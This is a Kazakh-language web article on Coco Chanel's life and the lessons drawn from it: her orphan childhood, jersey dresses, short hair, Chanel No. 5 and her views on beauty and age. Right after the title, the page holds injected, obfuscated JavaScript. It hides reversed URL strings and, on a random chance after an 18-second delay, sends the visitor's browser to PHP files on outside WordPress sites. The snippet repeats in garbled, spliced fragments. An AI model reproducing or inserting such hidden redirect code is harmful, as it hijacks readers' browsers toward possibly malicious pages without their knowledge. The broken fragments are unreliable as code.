2024-07-27

Коко Шанельдің өмір жолы

koko_shanel$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/koko_shanel.jpg» height=»181″ width=»139″ />Өзінің 88 жыл жасаған ғұмырында Ұлы Мадемуазель адамзат тарихындағы киім үлгісіне, атақты Сән үйлеріне, жұпардай аңқыған иіссуларға есімін мәңгілікке өшпестей қалдырып кетті. Шанель қаншама өнер туындыларын өмірге әкелді, киім үрдісіне жаңа серпін сыйлады, осының бәрін жиып қойғанда… ол оған дейін көзге еленбеген қарапайым әйел болатын.
Балалар үйінде тәрбиеленген жетім қыз – талантының арқасында күллі шартарап ғаламды жаулады емес пе? Сұлулық әлемі ШАНЕЛДЕНДІ. Иә, бүгінде Шанель есімін білмейтін адам жоқ. Осы жетістікке қаршадай қыз қалай жетті? Бас айналдырар табысының кілті неде?   

1. Әрбір таң Габриэль (Коко) Шанель үшін жаңа басталған өмірмен тең болған. Ол  өзі үшін тиімсіз өткен күнді бірден ұмытып кетудің тәсілдерін ойлап тапты. Күн басталысымен ол санасындағы барлық күмәнді ысырып  тастап, тек жақсылыққа ұмтылатын, осы күннен жақсылық күтетін, сенетін. Оның балалық шағы мен жасөспірім шағы қиыншылықпен өтті. Соған қарамастан өзінің өмірбаянына қызығушылық танытқандарды жаңылыстыратындай  аңыздар  ойлап табатын. Жетім өскен Габрэльді  тағдыр  керек емес заттай жағаға сан мәрте  лақтырып тастады, 10 жасқа келгенде ол өзінің уақытының көп екенін  байқады. Ұйқысы азайып, қалай жақсы өмір сүруге болады, осы туралы күндіз-түні ойлайтын болды. Ол өзінің өмір сүруі арқылы  болашақтың  өткеннен басталмайтынын, өмірдің кез-келген сәтінде карьера бастауға  болатынын дәлелдеді. Оған ұзақ уақыт бойы әлдилеген арманы, баласындай болған Сән үйін жауып тастауға тура келді,71 жасқа келгенде, ол туралы жұрттың бәрі ұмыта бастағанда бизнеске қайта келді,  бұрынғы даңқына қайта ие болды.
2. Шанель өміріндегі кез-келген кедергіні  жаңа бастаманың  бағдаршамы ретінде қабылдады. Өзінің кәсібін алғаш бастағанда ол «нағыз әйел» көйлегін дайындау құқына ие емес еді, оны заңсыз бәсеке тудырып отыр деп жауапкершілікке тартуға болатын, өйткені ол кәсіби тігінші емес-тін. Шанель ерлердің киімі тігілетін джерсиден әйелдер көйлегін тігіп,  байлыққа кенелді. Осылай  оның көйлектер әлеміндегі жаңалықтары ашыла бастады. Ол сол кездегі  өте күрделі тігілетін көйлектерді қарапайым ғана әдіспен , қарапайым, киюге ыңғайлы киімге айналдырды. Ол өзінің үлгілерін қағазға  сызып түсірмейтін және тікпейтін. Қайшыны алатын да  маникенге кигізіп қойып, ол қимылдағанша кесетін, сұлба пайда болғанша алаңсыз жұмыс істейтін. Осындай бір сәттерде Коконың  газ колонкасы күйіп кетіп, өрт тіпті бұрымын ала бастағанын да байқамаған.  Бұл оқиға да әйелдердің шаш үлгісінде төңкеріс жасады. Ертеңіне Үлкен жаңалықтың иесі бұрымын кесіп тастады да , адамдардың алдына салтанатты қалпында қайта шықты. Осылай 1917 жылы әйелдердің  қысқа шаш үлгілері сәнге ене бастады. Шанельге дейін әйелдер тек ұзын шашпен  жүруі керек болатын.
3. Шанель өміріне кездейсоқ  жолыққан  адамдарды енгізбейтін , сондықтан да оның өмірінде кездейсоқ, күтпеген жағдайлар  орын ала қойған жоқ. Ол адамдарды ажырата білетін, кімнің өзін ұнатпайтынын, кімге ұнайтынын айыра алатын, өзін ұнатпайтынын сезді болды, ол ортадан кетіп қалатын. Кокто, Дали, Пикассо, Дягилев, Стравинский оның жақын достары болды.
4. Коконың ұстазы — МАХАББАТЫ еді. Коконың әр сүйген адамы оның  өмірдегі университеті  болды. Махаббаттың көзге көрінбейтін арналары арқылы ол  өзі сүйген еркектердің  біліктілігін, білімін өзінің бойына сіңіріп отырды. Ақын Пьер Реверди, Элюра — карикатурист, саясаткер және баспагер, герцог Вестминстерский, әлемдегі ең бай адам, ұлы князь Дмитрий. Бұлардың әрқайсысы сол кездегі  белгілі тұлғалар еді.Коко алғашқыда олардың көшірмесі  болды. Атқа міну, ағылшын тілін  үйрену, аңшылық,балық аулау, теннис ойнау, газет шығару  осының бәрін үйренді. Әр  азамат оның  әйелдер киім үлгісіне, басқа да бастамаларына өзіндік үлесін қосты. Ол химик те, парфюмер де емес еді. Князь Дмитрийдің арқасында Шанель   осы саладағы  маңдайалды маман орыс патшасының сарай қызметкерінің баласы Бо Эренстпен  танысты. Бо Шанель ұсынған қызметтерге теңдессіз парфюмериялық  тәжірибесін қосты. Коко  әр иіссуды  өзі иіскеп, таңдады, соңында 80 құрамнан  тұратын «Шанель №5» иіссу формуласына тоқтады. Осылай алғаш рет  иісі тез сіңіп жоғалып кететін  гүлдердің ғана исі емес абстракті,  исі ұзақ  тұратын, бүгінге дейін әлемді  таңқалдырған аромат дүниеге келді.
5.Коко Шанель өмірінің парадоксі деп  талантының қозғаушы күші  өмірін таныды. Шанельге  дейін қара түс кедейлікпен қайғының белгісі болатын. Әйелдер себепсізден –себепсіз қара киім кимеуге тиіс еді. Шанель қара түсті  салтанатты әрі танымал түске айналдырды. Бес жыл бойы ол  тек қана қара көйлектер тігіп сатты, оның  ақ жаға мен   ақ жиектер жүргізген «түссіз» көйлектері, тәтті бәліштей тез сатылып кетіп жатты. Әйелдердің ақ түсті ұйықтағанда киетін киімдері Шанельден басталды. Ол, ерлерден жакет, галстукты жейде, шляпа сияқты киімдерді «ұрлап» әйелдер киетін киім үлгілерінің сәніне қосты.
6. Тәуелсіздік- бұл оның тәңіріне, өмірінің қағидасына айналды.  Алғашқы  сүйіктісімен бірге тұрғанда –ақ ол  өзі үшін тәуелсіздікті ашты, егер сен емес, олар саған қызмет етсе сен қанша ақша төлер едің? Ол өзіне осы сұрақты жиі қоятын. Достары оның есебінен  керемет өмір сүрген уақыттар болды, ол олардың   үлкен қарыздарын жабатын. Төлеу керек, бір кезде  олардың Шанельдің аяғынан тұруы  үшін төлегенін ұмыту үшін төлеу керек, қарыз болып қалуға болмайды, бұл оның ұстанымы болатын. Ақшаның арқасында ол өзінің ұяңдығынан құтылды, әйтпесе баста ол  салондарда жұмыс істеп жүргенде аузын да аша алмайтын. Еңбегінен түскен  пайда оған өзіне деген сенім және көпшіліктің алдында шешен әрі сауатты сөйлеу қабілетін сыйлады.
7. Әйелдің сұлулығы оның жетістігінің бір бөлшегі, олай болмаған жағдайда  ешкімді иландыра алмайсың. Әйел үшін жасы ұлғайған сайын, әдемі болып көріну аса маңызды.

«20 жас бұл табиғат сыйлаған сұлулық, 30 жас онда өмірдің іздері қалады, ал 50 жаста  сұлулықты сіз өзіңіз жасауыңыз керек». Шанель осылай дейтін. Кәріліктің жасаруға деген ұмтылыстан асқан жауы жоқ.  50 –ден кейін сен жас емессің. Бірақ мен 50 жасының өзінде өзінің қызы қатарлы өзіне немқұрайлы қарайтын әйелдерден жас көрінетіндерді білемін. Шанельдің өзі жасамыс тартқан кезінде де  жасөспірім қыздың кейбір келбетін  еске түсіретін. Ол өмір бойы 20 жастағы салмағын сақтады. Оның  үстіне ол әйелдерді жасартып көрсететін жаңа стильді ойлап тауып  қана қойған жоқ «еліктің лағындай» көрінетін келбетті қалай қалыптастыруды да үйретті. Жүзжылдықта екі-үш рет қана сұлулықтың  жаңа келбетін көрсететін  стандартсыз беттер  пайда болады. Шанель сондайлардың бірі еді.{jcomments on}

Яндекс.Метрика